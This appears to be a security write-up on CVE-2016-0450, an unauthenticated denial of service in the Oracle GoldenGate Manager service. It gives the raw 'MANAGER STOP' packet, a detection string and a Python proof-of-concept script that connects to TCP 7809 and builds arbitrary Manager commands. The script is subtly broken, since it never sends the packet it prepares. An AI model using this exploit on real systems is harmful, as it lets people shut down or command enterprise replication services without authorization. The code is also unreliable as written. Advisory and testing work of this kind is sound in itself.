CVE to PoC – CVE-2016-0450

Oracle GoldenGate

“This vulnerability allows remote attackers to cause a denial condition on vulnerable installations of Oracle GoldenGate. Authentication is not required to exploit this vulnerability.”

The Product

“Oracle GoldenGate is a comprehensive software package for real-time data integration and replication in heterogeneous IT environments. The product set enables high availability solutions, real-time data integration, transactional change data capture, data replication, transformations, and verification between operational and analytical enterprise systems.”

Oracle GoldenGate is a product widely adopted by multiple well-known companies. The strategic position of where this software is installed together with the data handled by it, increase the severity of remotely exploitable vulnerabilities such the one described in this document.

The software is compatible with multiple platforms such as Windows, Linux, Solaris and AIX. The version affected by these security issues are 11.2 and 12.1.2.
The following document describes a scenario in which the software is installed on a Windows Server 2008 R2 64bit machine with Oracle Database 12c and Windows Firewall configured to allow traffic on TCP port 7809.

The Vulnerability

The vulnerability can be triggered remotely by an attacker that has access to port 7809 on the target server. More information can be found here:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0450
http://www.zerodayinitiative.com/advisories/ZDI-16-021/

The affected service is called GoldenGate Manager and is the software that starts Oracle GoldenGate processes, collector processes, perform trail management and more. It runs by default with SYSTEM privileges.

Since the vulnerability exists within the logics of the application, no security mechanisms such as DEP, ASLR, etc.. can mitigate the issue.

Basically an attacker has the possibility to send commands to the Manager service without any form of authentication or authorisation. To do this the malicious user needs to:

• Obtain the GoldenGate suite of executables (installation is not necessary), which includes the Manager software and the executable called “ggsci.exe”; or
• Send directly the commands to the remote server following the structure of its custom protocol.

This document describes the latter technique.
Essentially each command sent to the server must:

• Start with the length of the packet (2 bytes); and
• The command issued to the Manager service with spaces replaced by the byte 0x9

This can be easily observed with a network sniffer (tcpdump/Wireshark) by monitoring two instances of GoldenGate communicate with each other.

To perform a Denial of Service the attacker simple needs to issue the “MANAGER STOP” command that orders the Manager server to shutdown.

The packet would be something similar:

\x00\x0cMANAGER\x09STOP

Detection and Mitigations Guidance

The attack is carried over a custom protocol. The recommendation is to apply immediately the patch released by the vendor.
Malicious requests can be difficult to detect since remote commands are part of the functionality of the software. Limitations can be however put in place, by preventing the “MANAGER STOP” command to be issued remotely. The string to search for would be “manager\x09stop”, case insensitive.

Summary

• The Denial of Service attack targets the Oracle GoldenGate versions 11.2 and 12.1.2 on each of the operating systems supported.
• All the vulnerabilities can be triggered remotely by an attacker that has access to TCP port 7809 (with default settings) on the target server.
• There are no exploit mitigations since the bug exists within the logics of the application.

Python scripts

cmd.py

import socket
import struct 
import sys


WELCOME = '''
--------------------------------------------------
Oracle GoldenGate Denial of Service Vulnerability

CVE-2016-0450
ZDI-16-021
--------------------------------------------------
'''

HELP = '''Usage: python {0} target [cmd]
Example: python {0} 192.168.0.100 "MANAGER STOP"
'''.format(sys.argv[0])
# MANAGER STOP - shuts down the service that must be then restarted manually
# Other commands, if known, can be provided to the manager

DEST_PORT = 7809 # 7809 is the default TCP port for the Manager Service

def appendLength(str):
 return struct.pack(">H", len(str)) + str  
 # The first 2 bytes (represented in big endian format) define the length of the packet

def prepCmd(str):
 cmd = str.replace(" ","\x09")
 # For some unknown reason spaces between each word are replaced with \x09
 return appendLength(cmd)


print WELCOME

if (len(sys.argv) < 2):
 print HELP
 exit(-1)

target = sys.argv[1]

if (len(sys.argv) < 3):
 cmd = "MANAGER STOP"
else:
 cmd = sys.argv[2]

print repr(prepCmd(cmd))
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.settimeout(10)

try:
 print "[*] Trying to connect to %s:%s" % (target, DEST_PORT)
 s1.connect((target, DEST_PORT)) 
except socket.error, err:
 print "[-] Host unreachable: %s" % err
 exit(-1)

print "[+] Connected.\n[+] Sending '%s'" % cmd
print repr(prepCmd(cmd))
d = s1.recv(1024)
s1.close()